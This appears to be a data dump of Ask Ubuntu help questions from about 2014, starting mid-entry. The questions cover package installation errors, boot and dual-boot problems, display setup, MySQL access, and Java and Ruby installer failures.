there and this is what i got : ubuntu @ ubuntu : ~ $ sudo apt-get install mesa-utils ttf-mscorefonts-installer wine-compholio cabextract pipelight-multi reading package lists ... done building dependency tree reading state information ... done package cabextract is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package mesa-utils is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source package ttf-mscorefonts-installer is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'mesa-utils ' has no installation candidate e : package 'ttf-mscorefonts-installer ' has no installation candidate e : package 'cabextract ' has no installation candidate ubuntu @ ubuntu : ~ $ from the last comment about updating . i 've updated and upgraded and this is what happened . any ideas ? thanks again in advance . ubuntu @ ubuntu : ~/downloads $ sudo apt-get install -- install-recommends pipelight-multi reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : pipelight-multi : depends : mesa-utils but it is not installable depends : ttf-mscorefonts-installer but it is not installable depends : wine-compholio ( > = 1.7.19-1~ ) but it is not going to be installed depends : cabextract but it is not installable e : unable to correct problems , you have held broken packages . ubuntu @ ubuntu : ~/downloads $ /ect/apt/sources.list bash : /ect/apt/sources.list : no such file or directory added from comment below : deb cdrom : [ ubuntu 14.04 lts _trusty tahr_ - release i386 ( 20140417 ) ] / trusty main restricted deb http : //archive.ubuntu.com/ubuntu/ trusty main restricted deb http : //security.ubuntu.com/ubuntu/ trusty-security main restricted deb http : //archive.ubuntu.com/ubuntu/ trusty-updates main restricted
502787	dual-display solution ( other than arandr ) on lubuntu/xubuntu ?	what i want to achieve is an elegant way to use my two screens on lubuntu or xubuntu . being elegant means : 1 ) working in the same extended-display mode as in ubuntu-desktop ( the common unity ubuntu ) or windows , or 2 ) some other workaround that limit my lxde or xfce desktop on one screen and see something else ( e.g . tty or xterm ) on the other screen . the story comes below ... this is on an old dell latitude d600 laptop . it has a 1024x768 lcd and a vga output . i installed xubuntu 12.04 lts on this laptop and later changed to lxde by installing lubuntu-desktop and removing most of xfce packages.now it has lightdm ( with unity-greeter ) and lxde . when i attached a secondary screen to the laptop 's vga output , the two screens were working in mirror mode , whether i was in tty , unity-greeter , or lxde desktop.this behavior was different from my previous experience on some other laptop . on that other laptop , i have ever had ubuntu 12.04 lts , ubuntu 13.10 , and ubuntu 14.04 lts installed . tty is usually displayed only on the external screen , and unity-greeter should work in extended mode , where the login dialog is only displayed on one of the screens , leaving the other screen nothing but an ubuntu icon as well as the greeter 's wallpaper . let alone the different behavior here , i found that neither of xfce or lxde has built-in support for extended mode . thus i was wondering if the behavior i observed above is laptop-dependent or actually distribution-dependent . having read lots of articles i found on google , i got to know arandr . however arandr worked inelegantly , and also appeared different from dual-screen solutions in ubuntu ubuntu-desktop or windows . when i use the print screen key for screen-shot i got this : looks normal ? not at all . since my external display was 1024x1280 ( a vertically placed 1280x1024 lcd ) , the two screens did n't really form a rectangle shape when placed together . if i had two windows maximized on the two screens the screen-shot would look like this : the upper right corner was not seen on any screen . this was why i said arandr was inelegant and behaved differently from the extended mode in ubuntu ubuntu-desktop and that in windows . if you 've never seen the extended mode in ubuntu-desktop or windows i could post an image for them later . the biggest problem was that , though i can not move my cursor into the non-existing region of the arandr desktop ( e.g . the upper right corner in my screen-shots ) , the desktop was rendered on the entire rectangle region . this means , if the bottom line of my two screens are not of the same vertical coordinate ( i.e . if my screens are not aligned to bottom ) , i will lose half of my task bar ( depending on which screen is placed higher ) ! and also , i found everything displayed extremely slowly on the vertical external screen . for example , when i open firefox , first the frame of the window and the blank page is flashed up to down , then the contents of the new-tab page the same way ... but things appeared ok on the laptop screen . story ends . please refer to the first paragraph for my objectives . achieving one of the two objectives will be good enough . i 've read this article : http : //superuser.com/questions/562657/x-on-one-monitor-a-bare-tty-terminal-on-another-linux for using xterm on one display while running the desktop on the other . however , xsetroot -display :0.1 -solid darkblue failed because it `` can not open display :0.1 '' . output of xrandr -- query : screen 0 : minimum 320 x 200 , current 2048 x 1280 , maximum 4096 x 4096 vga-0 connected 1024x1280+0+0 left ( normal left inverted right x axis y axis ) 376mm x 301mm 1280x1024 60.0*+ 75.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dvi-0 disconnected ( normal left inverted right x axis y axis ) lvds connected 1024x768+1024+512 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0*+ 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 s-video disconnected ( normal left inverted right x axis y axis ) i do n't really know how to identify my two screens using the numbers like :0 or :0.0 , etc .
502792	minecraft launcher screen stuck on `` starting launcher ''	i have openjdk7 running , it is able to execute , and i downloaded it from the site normally i do n't know what is going on any help ?
502793	forcing dvd boot	well it 's my first post ... i 've taken the job of doing a routine os change on a laptop and now i 'm facing a serious trouble since the bios and s.m.a.r.t check to press f12 or del to change the boot order and boot from a dvd is n't available . when it starts i get 4 options 1- ubuntu ( boots kubuntu 14.10 - the system to be replaced by windows 7 ) 2- some command related 3- same as above 4- also something related to commands and then the options of pressing e , c , etc ... to make a change on the boot with commands ( here i need help ) it 's been a long time since i last used this order and i do n't remember it + ca n't make a partition since the guy who `` fixed '' that laptop ( changed windows 8 to kubuntu ) locked the partition that has more space and it 's ntfs , so i 'm stuck here , tried with virtualbox to at least allow win 7 to run - vb downloaded , installed and then unistalled by itself , ca n't do boot since i do n't remember the commands to make it boot from the dvd unit once i get to the point of choosing either to boot kubuntu or wait . if someone could help me out with this big problem , would be great , since it 's a job and besides i hate windows , i have to do what the client asked for .
502794	upgrade from 13.10 to 14.04 failed	i ran 12.04 lts forever without a hitch . realized i was falling behind , so i took the plunge . first problem was that i had to take a phased approach ; could n't upgrade directly to 14 . but packages for 13.x were no longer available on us servers ( i 'm in san diego ) . i selected `` best server '' , and it took me to singapore . all good . first upgrade i did over ssh , from my lan . went from 12.04 to 13.04 . it took a few hours , but went without a hitch . everything tested good . next upgrade ( 13.04 to 13.10 ) i did over ssh , from work . again took a few hours , but everything went smoothly . when i got home i decided to go for the gold , and kicked off the final upgrade ( from 13.10 to 14.04 ) from the local machine . first i changed the source from singapore back to the us . then i started the upgrade . it went well , but eventually started returning errors . first was a minor error , which said the install would continue . after two or three i received a message that the install failed and would be halted . but it continued . i noticed that the video kept turning off and on . i allowed it to continue to completion , after a few more errors . the end state is that the host machine appears to lock as soon as it boots . however i am able to ssh into the machine , and it appears to be functioning properly . i believe the problem is with x-windows . i have an nvidia adapter , which i believe may be problematic with this release . i would really like to fix this install , instead of reloading from scratch . from the remote machine i just attempted the following command : sudo apt-get -f install and received this error ( leaving off most of the output ) : the following packages will be removed : xserver-common-lts-trusty the following new packages will be installed : libglamor0 libspice-server1 libxatracker2 xorg xserver-xorg xserver-xorg-input-all xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-all xserver-xorg-video-ati xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-glamoregl xserver-xorg-video-intel xserver-xorg-video-mach64 xserver-xorg-video-mga xserver-xorg-video-modesetting xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-r128 xserver-xorg-video-radeon xserver-xorg-video-s3 xserver-xorg-video-savage xserver-xorg-video-siliconmotion xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-trident xserver-xorg-video-vesa xserver-xorg-video-vmware ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... . fetched 2,819 kb in 7s ( 369 kb/s ) extracting templates from packages : 100 % ( reading database ... 382361 files and directories currently installed . ) removing xserver-common-lts-trusty ( 2:1.15.1-0ubuntu2~precise1 ) ... removing 'diversion of /usr/lib/xorg/protocol.txt to /usr/lib/xorg/protocol-prec ise.txt by xserver-common-lts-trusty' dpkg-divert : error : rename involves overwriting `/usr/lib/xorg/protocol.txt ' wit h different file `/usr/lib/xorg/protocol-precise.txt ' , not allowed dpkg : error processing package xserver-common-lts-trusty ( -- remove ) : subprocess installed post-removal script returned error exit status 2 errors were encountered while processing : xserver-common-lts-trusty e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is there anything i can do to get this fixed , short of starting from scratch ? thanks ! brian
502795	so i built a new rig and put ubuntu 14 64bit on it as only os , i have 2 xfx radeon 6870 cards in	one is dual dis and the other is not i have the cd for the non dual dis but i have no idea how to install the drivers , im sooo noob to ubuntu but i rly like it ... i want to dual boot windows also just because i am way more familiar with it but i have no idea first off howto install the graphic card drivers and i do not have any idea how to partition the 240 ssd to even begin to put any of my win os 's on ... .i guess first question is the amd drivers fopr my graphic cards and then how to partition the drive to install a windows boot ... ..also if you dont mind i have a usb drive with xbuntu kubuntu and xbmc for ubuntu which id also love to have on my rig in ubuntu ... .would ne of them be handy to have on and why ? my ultimate goal with the rig is to run several monitors for work and some play . i will not be gaming nething that will need the cards to much . mainly for the multiple display .
502796	cant install or download anything	i just bought a new computer and it has ubuntu already on it , and i want to get rid of it and install windows 7 . so i put my disk in , and i click `` auto run , '' and it says the archive manager has had an error . my computer also came with driver update and installation cd 's , same thing happens . the archive manager fails . i also cant download anything from the internet . the archive manager wont let me open anything . how do i get rid of ubuntu when i cant even run or download anything ? ? ? ?
502799	why access denied for user root right after i set up its password ?	i have installed php and mysql . but can not set the root password . this is what i 've done so far : sudo apt-get install mysql-server sudo apt-get install mysql-client after that : mysql -u root -p mypass and when it asks me for my pass , i type mypass again . after that it says : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) what can i do ? i thought about modifying the configuration files by hand , but i have no idea where they are .
502802	how to download and install .deb	i have looked at several pages and still am not getting clear instructions on how to download and insatall .deb specifically i would like to download this one : http : //packages.ubuntu.com/raring/i386/libhal1/download can someone please explain it like i 'm 5 ?
502803	need to take control over booting process	need to create a modified ubuntu live image which needs to mount all the available partitions on all available disks but only in read-only mode by default . i know that i can do that with the root ( / ) filesystem but i need to load all the partitions read only . and the root filesystem may be needed to be in rw mode . is there any kernel flag for that ? i have searched all over and can not seem to find anything beyond udev and fstab , both of which do not seem to be controlling the mounting process during the boot for devices . with fstab , it does control the mounting but only for the devices listed in file . how do i mount all those devices in ro mode ?
502805	i have dual boot 12.04 lts and 14.04 lts , how do i remove 12.04 lts ?	i had 12.04 lts and did a dual boot with 14.04 lts in case something went wrong with upgrading . it seems to be working fine with either version , so to remove 12.04 leaving just 14.04 lts should i remove the partition containing 12.04 and run upgrade-grub before rebooting ? or is there a better way ? edit here are links to screenshots : https : //www.dropbox.com/s/x25l4n7hs760uur/screenshot % 20from % 202014-07-26 % 2009_29_56.png https : //www.dropbox.com/s/b7tcgku7506wr10/screenshot % 20from % 202014-07-26 % 2009_26_52.png
502807	starcraft 2 ubuntu 14.04 installation for a noob	i know people have got this working but i 'm frustrated and i do n't have any more hair to pull out . i followed some online instructions here http : //www.nosuchthingastwo.com/blog/2014/04/28/starcraft-ii-on-ubuntu-14-04/ and got this as an error : ok the ubuntu question centre did n't let me post the error , however it was trying to download eurofixi.exe from an ftp site and not getting any response and having to repeat itself over and over with no success . the game seems to have downloaded but there 's no executable file to run with wine . when i try to redownload the game with play on linux , it gives me the option press play , and when i do this it loads the game in part , asks me to log into battlenet ( not giving me the option to play offline ) then goes pear shaped . please help i 've just purchased the game and would really love to play it . thank you .
502811	why my ibus input ca n't type 'que ' or 'qve ' in chinese ?	i 'm using ubuntu14.04 combining with wmii . but i ca n't type 'que ' or 'qve ' to get chinese character 'çźş ' . what to do ?
502813	i am having trouble downloading wine onto my linux mint 17	i type in : sudo add-apt-repository ppa : ubuntu-wine/ppa i put in my password , then this comes up : you are about to add the following ppa to your system : welcome to the wine team ppa . here you can get the latest available wine betas for every supported version of ubuntu . this ppa is managed by scott ritchie and maarten lankhorst . more info : https : //launchpad.net/~ubuntu-wine/+archive/ubuntu/ppa press [ enter ] to continue or ctrl-c to cancel adding it i press enter : executing : gpg -- ignore-time-conflict -- no-option -- no-default-keyring -- homedir /tmp/tmp.oho5omagcf -- no-auto-check-trustdb -- trust-model always -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80 -- recv-keys f9cb8db0 gpg : requesting key f9cb8db0 from hkp server keyserver.ubuntu.com gpg : key f9cb8db0 : public key `` launchpad ppa for ubuntu wine team '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) then i type : sudo apt-get install wine1.6 and the results are : reading package lists ... error ! e : type 'ppa : ubuntu-wine/ppa ' is not known on line 1 in source list /etc/apt/sources.list.d/additional-repositories.list e : the list of sources could not be read . e : the package lists or status file could not be parsed or opened . the ppa : ubuntu-wine/ppa ' is on line 1 of my source list , i keep on clearing the additional repositories and downloading it again , and these are the results all three times . can anyone help me ?
502815	should `arm-none-eabi-gcc` include a `stdio.h` ?	i 'm trying to build a simple example from the sdk for the ti cc3200 ( cortex m4 ) , but when i try to compile it complains about stdio.h . make cc ../main.c ../main.c:45:19 : fatal error : stdio.h : no such file or directory # include < stdio.h > ^ compilation terminated . make : *** [ obj/main.o ] error 1 looking into the include dirs , it seems to be right , there is no stdio.h file . # arm-none-eabi-gcc -print-search-dirs install : /usr/lib/gcc/arm-none-eabi/4.8.2/ programs : =/usr/lib/gcc/arm-none-eabi/4.8.2/ : /usr/lib/gcc/arm-none-eabi/4.8.2/ : /usr/lib/gcc/arm-none-eabi/ : /usr/lib/gcc/arm-none-eabi/4.8.2/ : /usr/lib/gcc/arm-none-eabi/ : /usr/lib/gcc/arm-none-eabi/4.8.2/../../../arm-none-eabi/bin/arm-none-eabi/4.8.2/ : /usr/lib/gcc/arm-none-eabi/4.8.2/../../../arm-none-eabi/bin/ libraries : =/usr/lib/gcc/arm-none-eabi/4.8.2/ : /usr/lib/gcc/arm-none-eabi/4.8.2/../../../arm-none-eabi/lib/arm-none-eabi/4.8.2/ : /usr/lib/gcc/arm-none-eabi/4.8.2/../../../arm-none-eabi/lib/ # ls /usr/lib/gcc/arm-none-eabi/4.8.2/include-fixed limits.h readme syslimits.h # ls /usr/lib/gcc/arm-none-eabi/4.8.2/include/ arm_neon.h float.h iso646.h mmintrin.h stdalign.h stdarg.h stdbool.h stddef.h stdfix.h stdint-gcc.h stdint.h stdnoreturn.h tgmath.h unwind-arm-common.h unwind.h varargs.h but , should there be ? or is that something that should be provided by the sdk for the specific device ?
502819	error flash player firefox	i installed flash player in ubuntu 14.04 but when i open firefox i see the message failed to start libpepflashplayer.so in any videos . failed to start `` libpepflashplayer.so '' how can i solve this ?
502829	quickest way to install a deb only available in an older version of ubuntu ?	although i am sure a duplicate is somewhere in au , i could not find it . i 'm in 14.10 i need configure-trackpoint what is the most simple and straightforward way to accomplish this ?
502834	rvm cant install ruby 2.0.0-p451	hello i am trying to install ruby 2.0.0-p451 via : rvm install ruby 2.0.0-p451 and i get the following error : searching for binary rubies , this might take some time . no binary rubies available for : ubuntu/14.04/x86_64/ruby-2.0.0-p451 . continuing with compilation . please read 'rvm help mount ' to get more information on binary rubies . checking requirements for ubuntu . requirements installation successful . installing ruby from source to : /usr/local/rvm/rubies/ruby-2.0.0-p451 , this may take a while depending on your cpu ( s ) ... ruby-2.0.0-p451 - # downloading ruby-2.0.0-p451 , this may take a while depending on your connection ... % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- 0:00:01 -- : -- : -- 0warning : failed to create the file ruby-2.0.0-p451.tar.bz2.part : permission warning : denied 0 10.2m 0 941 0 0 585 0 5:05:34 0:00:01 5:05:33 585 curl : ( 23 ) failed writing body ( 0 ! = 941 ) there was an error ( 23 ) . checking fallback : http : //ftp.ruby-lang.org/pub/ruby/2.0/ruby-2.0.0-p451.tar.bz2 % total % received % xferd average speed time time time current dload upload total spent left speed 0 0 0 0 0 0 0 0 -- : -- : -- 0:00:01 -- : -- : -- 0warning : failed to create the file ruby-2.0.0-p451.tar.bz2.part : permission warning : denied 0 10.2m 0 1167 0 0 613 0 4:51:36 0:00:01 4:51:35 613 curl : ( 23 ) failed writing body ( 0 ! = 1167 ) there was an error ( 23 ) . failed download there has been an error fetching the ruby interpreter . halting the installation . i have rvm but for some reason i ca n't download the version of ruby that i need . thanks anyone who knows what i need to do and i have tried using sudo but that is not a rvm command apparently . rvm get head downloading https : //get.rvm.io bash : line 709 : /usr/local/rvm/release : permission denied could not update rvm , get some help at # rvm irc channel at freenode servers . thanks for trying to help , i have ran every suggestion but nothing seems to be working= ( thanks again though and i hope we can figure it out soon !
502836	internet bandwidth consumption monitor process wise monitoring ?	i had some three or four askubuntu pages open in my firefox 's tabs , and the pages suddenly started responding extremely slow . i checkd the system monitor , and it showed huge amounts of data being downloaded and it was continuous at the highest bandwidth my dsl connection can offer with some notches at intervals . i could n't figure out the reason why it happened , could n't draw any conclusions from the monitors process information . then i closed the browser , and the download graph went down too . i need help with some command tool/script ( preferable ) that would instantly display an ordered list of the processes consuming my bandwidth . ( some packet tracing utility ? bandwidth consumption monitor ? ) and please summarize how to get it done . update 1 : i tried nethogs and made some test download with web broswer and other tools . nethogs did show what programs were consuming the bandwidth , ( please note that previously in my problem i too guessed it was firefox , but the actual problem was what in firefox is devouring my bandwidth ? it 's not auto-update ! i do n't think i 've configured anything for autoupdates in my system . ) i want the suggested tools to show me what things are being downloaded and not just the client ; for example the tool should say `` it 's chromium-browser downloading file1.something and file2.somethingelse '' .
502837	.dbus folder in home folder belongs root	i have a folder ~/.dbus in my homefolder that is only read and writeable by root : drwx -- -- -- 3 root root 4096 feb 17 17:30 . drwx -- -- -- 2 root root 4096 feb 17 17:30 session-bus is this the correct setting ? or if not , how could that happen ?
502839	unable to install lmc_1.2_32_i386 in ubuntu14.04	i recently shifted to ubuntu14.04 and when i try to install lan messenger , it gives an error of bad quality image . i downloaded it from official site of lan messenger for ubuntu . these are errors : - lintian check results for /home/rahul/downloads/lmc_1.2.32_i386 ( 1 ) .deb : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . e : lmc : control-file-has-bad-permissions postinst 0775 ! = 0755 e : lmc : control-file-has-bad-permissions postrm 0775 ! = 0755 e : lmc : control-file-has-bad-permissions prerm 0775 ! = 0755 â
502842	can i use pixmap engine in gtk3 theme ?	i asked this question before but i will reword it this time . can i use the `` pixmap '' engine in gtk3 `` .css '' files ? if so , how ? i made a theme that i was pretty happy with , but was for a gnome 2 desktop . it used the pixmap engine to call on images saved in a folder to make buttons and text boxes . these images would be to hard for me to write out into a .css file .
502843	windows 7 wo n't boot after side-by-side installation of ubuntu 14.04.1	i installed ubuntu 14.04.1 from a dvd i burned . ubuntu runs perfectly , but when i select windows 7 from grub , the screen goes blank ( with some coloured lines at the very top of the screen ) . from here , the only way to get back to grub to force shut-down the machine from the power button . i have updated grub2 . i have also tried boot repair , but all it did was create two windows options from grub menu : windows 7 ( loader ) ( on 'dev/sda1 ) windows 7 ( loader ) ( on /dev/sda2 ) both of them have the same result as earlier . blank screen with some colourful pixels at the top of my monitor ( top 2 or 3 pixels ) . here 's my boot repair pastebin : http : //paste.ubuntu.com/7862319/ please help ! i 'm admittedly way out of my depth as far as troubleshooting goes . p.s . this is not a duplicate of ca n't boot windows 7 after installing ubuntu as i am able to select windows from the grub menu but it crashes afterwards .
502845	14.04 turn off mouse wheel workspace switching without compiz	i do n't seem to have compiz installed . i need to turn off the infernal workspace switching because when i drift ever so slightly out of a window while scrolling with my wheel , bang- my app has disappeared ! i do n't see compiz in any menu , so if i need it , where would i find it ( if it 's already installed ) ? i ca n't ( can not ) install it . ( please let 's not get sidetracked with a discussion about that . ) i am not using unity . i use kde plasma ( kubuntu ) and kdm .
502846	trying to keep users in their home directory	i have created a user ; brandon . i am trying to keep 'brandon ' in his home directory ( `` /home/brandon/* '' ) , i would like him to be able to edit/delete/create folder and files , but i do n't want him to go to `` /home/ '' or anything else before his directory . i have webmin/virtualmin , but i still can not figure it out . can anyone explain to me any configs i need to edit or someway i can do it with webmin ? thanks !
502848	clean install ubuntu 14.04 erased all win7 partitions , how to recover with testdisk ?	am totally new to linux , recently i have installed ubuntu 14.04 on my windows 7 professional desktop , on windows i had 3 partitions ( except windows partition ) while installation i had not selected any partition to install ubuntu 14.04 , while in ubuntu installation i only selected replace windows option and not selected any partition selection options . after installation my desk top has only one hard disk with space of 160 gb . disk showing 5 swap partitions . so , i read and used testdisk to recover erased partitions while running testdisk some problems are facing , attached screen shot . so , kindly help me how to use testdisk to recover 3 partitions step by step , what are the requirements to use testdisk , and how to recover successfully without errors . thanks in advance , tell me next step form here , what to select and what to do ? from above screen by pressing enter to continue , below screen appear . from this again next step to do ? regards raju b
502849	sshing into a ubuntu vm instance	i have an ubuntu vm instance running on my laptop . both host and vm run the same os - ubuntu 12.04 . i tried to ssh from host like ssh username @ < vm-ip > it tries for some time and then says ssh : connect to host < ip-address > port 22 : connection timed out then i tried to ping i get 100 % packet loss . which i guess is because there is no established route . how should i fix this ?
502853	oracle installation in ubuntu	how to install oracle 12c weblogic server in ubuntu 14.04 from terminal . i tried to install by typing sudo apt-get install oracle but it shows me : the program 'oracle ' is currently not installed . you can install it by typing : sudo apt-get install golang-go.tools i do n't think this is that what i am looking for please somebody help me how do i install it .
502857	restrict access to internet in guest session in 14.04 lts	ciao ! i am using ubuntu 14:04 lts and would like to restrict access to the internet in guest session at particular times , for example , in use from 10 am to 12 pm and from 5 pm to 7 pm . for all the day only the network should not be used . admin and guest are on the same desktop thank you
502859	grub rescuse revovery ?	i have ubuntu 12.04 lts and it was working fine two nights ago and now all day today it has shown me this : error : unknown filesystem grub rescue > i know how to recover from this , but are all my files gone because of this ? please help .
502860	ubuntu from an external hdd	i have ubuntu in external hdd . this works fine with my laptop from where i had installed it . can i take this external to my desktop and boot ubuntu from it ?
502861	ca n't find the maas file on my system /usr/share/maas/maas/urls.py	i do n't know where i have gone wrong while installing maas.i ca n't access the maas webpage from my host browser.i checked for errors . apache2 is running , my hostname is correct but i could n't find the file.someone help me..
502863	lxde and nautilus ?	i have lxde desktop installed on ubuntu 14.04 and im having issues with the pcmanfmm file manager . like if i try and copy a file from desktop to my secondary storage drive it says permission denied . i suspect this has to do with pcman . ive been trying to find a way to get nautilus to work with lxde but was unsuccesfull . anyone got any tips on how to get it working or why im getting a permission denied when trying to copy files ?
502864	filezilla file download problem	i 'm using filezilla on ubuntu 14.04 . but i did n't get any way to download file by fillezilla . drag and drop like windows is not working and not even direct download option . please help .
502865	network manager icon is n't in the unity panel	i accidentally purged network-manager . hopefully , i downloaded the debs required by network-manager and installed them . now , the network-manager indicator is not in the unity panel . is there a fix ? thanks a lot . i 'm using ubuntu 14.04 trusty tahr 64 bit . by the way , i 've already searched the interwebs and have n't found a fix .
502866	how to access ssh	i need to access mysql database using command prompt . may i know the steps to access it using linux server . i tried to access using putty but i am getting error `` server refused our key . '' please let me know step by step procedure
502869	can not boot any system after trying to install ubuntu	i got a dell laptop ( dell inspiron 1420 ) with windows vista by default . i wanted to install linux ubuntu on it : i burned the iso file to a 16gb flash memory i booted the laptop from this flash memory . when i tried to install ubuntu on the hard disk an error appeared . so i tried to boot another time : but i could n't boot in the second time , so i booted from the hard disk and entered windows this time . i burned the iso file to the hard disk . note : i have three partitions on the hard disk : c : with windows d : for files and e : for linux another note : i used universal usb installer to install linux when i restarted the laptop it entered ubuntu without the booting menu . i tried every thing to enter windows but i failed . so i browsed the internet from ubuntu to find a solution . after that i closed the lid of the laptop ( i was used to that and i thought then it would be in the stand by mode ) but when i opened it again i saw a black window with the pointer of dos in the top left of the screen and it does n't write . i restarted the laptop many times but always i see this screen . what 's the problem and what can i do for it ? the biggest problem is that i ca n't boot ubuntu or windows in this question `` ca n't boot windows vista after installing ubuntu `` he can boot ubuntu but i ca n't boot any system
502871	invisible mouse on 14.04 with nvidia geforce4 ti 4200	i installed a fresh install of xubuntu 14.04 and the mouse is not visible on my screen . it works , but it seems to be invisible . how can i get it on screen ? i had the same problem on a ubuntu 14.04 live-cd so it seems to be a problem with my graphics card in ubuntu in general . i tried earlier apt-get install nvidia-173 which worked on my old monitor , but then i could n't access the desktop anymore with my only 1024x768 lcd-display , so i had to reinstall . maybe a solution would be to configure a right xorg.conf with the old nvidia-173 driver for my computer , but there is no xorg.conf anymore in /etc/x11 so this seems to have changed in 14.04 too . how would i have to create such a file ?
502873	will i lose all the data in my hard disk when i install ubuntu alongside my windows 8 ?	i am using windows8 and now i am trying to install ubuntu alongside my windows8 .my professor has warned that i might lose all my data in the hard disk.will i lose the data ?
502874	14.04.1 upgrade	i tried to upgrade my ubuntu version from 14.04 to 14.04.1 , but something went wrong . after restarting the computer , i set up the cryptsetup and the computer stays there forever . how can i fix this error ? thanks
502876	ubuntu 14.04 install with custom swap size using lvm ?	i want to install ubuntu 14.04 with lvm and encryption . but the problem is that my computer has a large ram ( 16gb ) and a small sdd disk ( 60gb ) . so i think only a small amount of space for swap is enough but i 'm not sure how i can specify the amount of space for the swap partition . i selected `` something else '' choice , but i do n't think i can setup lvm there ... thanks
502877	having problem with installing jdk 7 and 8	i wanted to install jdk 7 and 8 on my system and i followed bellow post : http : //stackoverflow.com/questions/16263556/installing-java-7-on-ubuntu but now , when i enter the : sudo apt-get install oracle-java7-installer i face with following error : sudo apt-get install oracle-java7-installer reading package lists ... done building dependency tree reading state information ... done oracle-java7-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 135 not upgraded . 3 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y setting up oracle-java7-installer ( 7u65+7u60arm-0~webupd8~2 ) ... downloading oracle java 7 ... -- 2014-07-26 12:37:13 -- http : //download.oracle.com/otn-pub/java/jdk/7u65-b17/jdk-7u65-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 63.85.36.73 , 63.85.36.40 connecting to download.oracle.com ( download.oracle.com ) |63.85.36.73|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u65-b17/jdk-7u65-linux-x64.tar.gz [ following ] -- 2014-07-26 12:37:15 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u65-b17/jdk-7u65-linux-x64.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 23.73.246.140 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |23.73.246.140|:443 ... connected . http request sent , awaiting response ... 503 service unavailable 2014-07-26 12:37:18 error 503 : service unavailable . download failed oracle jdk 7 is not installed . dpkg : error processing package oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 setting up oracle-java8-installer ( 8u11+8u6arm-1~webupd8~3 ) ... downloading oracle java 8 ... -- 2014-07-26 12:37:19 -- http : //download.oracle.com/otn-pub/java/jdk/8u11-b12/jdk-8u11-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 23.216.11.120 , 23.216.11.90 connecting to download.oracle.com ( download.oracle.com ) |23.216.11.120|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/8u11-b12/jdk-8u11-linux-x64.tar.gz [ following ] -- 2014-07-26 12:37:21 -- https : //edelivery.oracle.com/otn-pub/java/jdk/8u11-b12/jdk-8u11-linux-x64.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 23.73.246.140 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |23.73.246.140|:443 ... connected . http request sent , awaiting response ... 503 service unavailable 2014-07-26 12:37:24 error 503 : service unavailable . download failed oracle jdk 8 is not installed . dpkg : error processing package oracle-java8-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of oracle-java7-set-default : oracle-java7-set-default depends on oracle-java7-installer ; however : package oracle-java7-installer is not configured yet . dpkg : error processing package oracle-java7-set-default ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : oracle-java7-installer oracle-java8-installer oracle-java7-set-default e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i think my problem is coming from error 503 , but how i can fix it . in addition , always when i try to install another package i face with this message . at least , how i can get rid of this message . thanks
502878	how to set a shortcut to change to specified language ( gnome 2 )	i am using 4 languages , and may need even more soon . that makes switching by repeatedly pressing ctrl+shift until i get to the language i need a little bit uncomfortable a while ago in windows i could easily set up ctrl+shift+num to switch to a specific language . for example : ctrl+shift+1 to switch to english , ctrl+shift+2 to switch to russian , ctrl+shift+3 to switch to ukrainian , etc . how do i set stuff this way in gnome 2 enviroment ?
